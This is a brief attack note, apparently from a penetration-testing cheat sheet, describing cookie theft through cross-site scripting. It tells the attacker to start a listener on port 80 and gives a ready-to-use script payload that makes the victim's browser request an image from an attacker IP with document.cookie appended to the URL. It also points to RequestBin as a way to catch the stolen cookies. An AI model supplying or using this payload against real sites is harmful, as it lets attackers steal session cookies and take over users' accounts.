attacker: Start listener on 80 attacker: Send payload (change the IP below).

<script>new Image().src="http://192.168.119.131/cookie.jpg?output="+document.cookie;</script>

Also consider using websites like RequestBin to intercept cookies.